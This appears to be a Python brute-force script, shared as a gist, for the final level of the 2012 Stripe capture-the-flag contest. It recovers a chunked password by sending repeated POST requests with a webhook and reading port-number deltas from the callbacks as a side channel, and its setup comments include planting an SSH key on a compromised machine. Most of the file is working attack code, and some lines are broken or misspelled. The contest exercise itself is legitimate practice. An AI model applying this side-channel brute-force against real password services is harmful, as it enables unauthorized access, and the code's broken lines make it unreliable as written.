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Created August 29, 2012 21:22
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Stripe-CTF Level08 BruteForcer
# Capture the Flag level08(last level)
import socket
import threading
import urllib
import httplib
import time
global start
global elapsed
start = time.time()
global level02Server
global level08Server
global userName
#YOUR DATA GOES HERE<--------------------------------------------------------------------------------------
level02Server = "" #Put your level 02 server name here
level08Server = "" #Put your level 08 server name here
userName = "/user-curuypbgor/" #Put your level 08 /user-name/ here(note the "/"'s)
PORT = 6111 #Pick an unused port, may need to guess and check for an open one
#Upload this to your level02 server and run it with python
#1) Create an ssh key pair for your level02 server by typing "ssh-keygen"
#2) Hit enter a few times till the and id_rsa files are created
#3) Upload the to your level02 server, renamed it to "authorized_keys", place it
# in /home/user-abcdefhijk/.ssh (might need to make the .ssh directory)
#4) run chmod 600 authorized_keys on your authorized_keys file
#5) Upload this script to your level02 machine
#6) Open up terminal/console and type ssh your level02 server)
#6) Run this script and consider buying Armando/Kuskos/Zach/Ray lunch, over 20 hours went into this.
#7) Enjoy your Stripe-ctf shirt
#YOUR DATA GOES HERE<--------------------------------------------------------------------------------------
HOST = '' # Symbolic name meaning all available interfaces
# Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
global chunk
chunk = "000"
global prevChunk
prevChunk = "000"
global beginList
beginList = 0
global listOfResults
listOfResults = []
global reTest
reTest = 0
global integrity
integrity = 0
global flag
flag = "xxxxxxxxxxxx"
global chunk1Solved
global chunk2Solved
global chunk3Solved
global chunk4Solved
chunk1Solved = "xxx"
chunk2Solved = "xxx"
chunk3Solved = "xxx"
chunk4Solved = "xxx"
global chunk1Boolean
global chunk2Boolean
global chunk3Boolean
global chunk4Boolean
chunk1Boolean = 0
chunk2Boolean = 0
chunk3Boolean = 0
chunk4Boolean = 0
global chunk1TrueDelta
global chunk1FalseDelta
chunk1TrueDelta = 3
chunk1FalseDelta = 2
global chunk2TrueDelta
global chunk2FalseDelta
chunk2TrueDelta = 4
chunk2FalseDelta = 3
global chunk3TrueDelta
global chunk3FalseDelta
chunk3TrueDelta = 5
chunk3FalseDelta = 4
global trueDelta
global falseDelta
trueDelta = 3
falseDelta = chunk1FalseDelta
global currentChunk
currentChunk = 1
global parseData
global victory
victory = "true"
lock = threading.Lock()
lock2 = threading.Lock()
def getChunkNum(num):
if num < 10:
return "00" + str(num)
elif num < 100:
return "0" + str(num)
return str(num)
class listener(threading.Thread):
def run(self):
global chunk
global prevChunk
global beginList
global listOfResults
global reTest
global elapsed
global victory
global integrity
global parseData
global trueDelta
global falseDelta
global currentChunk
global chunk1Solved
global chunk2Solved
global chunk3Solved
global chunk1TrueDelta
global chunk1FalseDelta
global chunk2TrueDelta
global chunk2FalseDelta
global chunk3TrueDelta
global chunk3FalseDelta
global level08Server
global level02Server
lastChunk = 0
while 1:
conn, addr = s.accept()
while 1:
data = conn.recv(128)
if not data: break
parseData = data[107:111]
#print data
#print repr(data) #uncomment for demo
if parseData == "fals" and currentChunk == 4:
print '{"Success": "false"}'
if parseData == "true":
print '{"Success": "true"}'
chunk = str(int(chunk) - 1)
print 'Flag Found: '+ chunk1Solved + chunk2Solved + chunk3Solved + chunk
elapsed = (time.time() - start)
print 'Solve time ~', elapsed, 'seconds, you mad bro? Like a boss.'
print 'Sometimes a threading error occurs and the wrong chunk variable gets listed, double check in the above output for the tested password that returns true if your flag doesn't work'
print 'Command+C to exit program.'
while 1:
chunk = chunk
chunkPort = addr[1]
diff = chunkPort - lastChunk
#print 'Port', chunkPort #uncomment for demo
#print 'Diff', diff #uncomment for demo
lastChunk = chunkPort
if currentChunk == 4:
if parseData == "fals":
print chunk1Solved + chunk2Solved + chunk3Solved + chunk.zfill(3)
if diff == trueDelta and currentChunk != 4: #good chunk candidate
chunk = prevChunk
retest = 1
integrity = integrity + 1
print flag, ': Encountered as a possibly valid chunk ', integrity, 'times, retesting for confirmation.'
if integrity == 10 and currentChunk == 1:#check condition for valid chunk1, move to chunk2
print '\nAccepting '+ chunk +' as candidate for Chunk 1, current flag estimated to be '+ chunk +'xxxxxxxxx.\n'
chunk1Solved = chunk
trueDelta = chunk2TrueDelta
falseDelta = chunk2FalseDelta
currentChunk = 2
integrity = 0
chunk = 0
if integrity == 10 and currentChunk == 2:#check condition for valid chunk2, move to chunk 3
print '\nAccepting '+ chunk +' as candidate for Chunk 2, current flag estimated to be '+ chunk1Solved + chunk +'xxxxxx.\n'
chunk2Solved = chunk
trueDelta = chunk3TrueDelta
falseDelta = chunk3FalseDelta
currentChunk = 3
integrity = 0
chunk = 0
if integrity == 10 and currentChunk == 3:#check condition for valid chunk3, move to full flag solution
print '\nAccepting '+ chunk +' as candidate for Chunk 3, current flag estimated to be '+ chunk1Solved + chunk2Solved + chunk +'xxx.\n'
chunk3Solved = chunk
currentChunk = 4
integrity = 0
chunk = 0
elif diff != trueDelta and diff != falseDelta and currentChunk != 4:#falsed chunk candidate
chunk = prevChunk
reTest = 1
print flag, ': Inconclusive result, retesting.'
elif diff == falseDelta and currentChunk != 4: #known false candidate
integrity = 0
print flag, ': Ruled out as an invalid chunk.'
if chunk == "999" and currentChunk != 4:
beginList = 0
class sender(threading.Thread):
def run(self):
global chunk
global chunk1Solved
global prevChunk
global beginList
global listOfResults
global reTest
global flag
global integrity
global trueDelta
global falseDeltai
global level02Server
global level08Server
global userNamei
global PORT
sPort = str(PORT)
while 1:
#print "sending request"
chunk = getChunkNum(int(chunk))
#print "trying password " + chunk
if currentChunk == 1:
flag = chunk + '000000000'
params = '{"password": "'+ chunk +'000000000", "webhooks": ["'+ level02Server +':'+ sPort +'"]}'
#print 'chunk 1 testing ', params
if currentChunk == 2:
flag = chunk1Solved + chunk + '000000'
params = '{"password": "'+ chunk1Solved + chunk+'000000", "webhooks": ["'+ level02Server +':'+ sPort +'"]}'
#print 'chunk 2 testing ', params
if currentChunk == 3:
flag = chunk1Solved + chunk2Solved + chunk + '000'
params = '{"password": "'+ chunk1Solved + chunk2Solved + chunk+'000", "webhooks": ["'+ level02Server +':'+ sPort +'"]}'
#print 'chunk 3 testing ', params
if currentChunk == 4:
flag = chunk1Solved + chunk2Solved + chunk3Solved + chunk.zfill(3)
params = '{"password": "'+ chunk1Solved + chunk2Solved + chunk3Solved + chunk+'", "webhooks": ["'+ level02Server +':'+ sPort +'"]}'
#print 'Final POST request: ', params
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPSConnection(level08Server)
conn.request("POST", userName, params, headers)
response = conn.getresponse()
data =
if beginList == 0:
prevChunk = chunk
chunk = str(int(chunk) + 1)
if reTest == 0:
prevChunk = listOfResults.pop()
chunk = listOfResults.pop()
integrity = 0
reTest = 0
t = listener()
y = sender()
while True:
except(KeyboardInterrupt, SystemExit):
print '\n Application Terminated!.\n'
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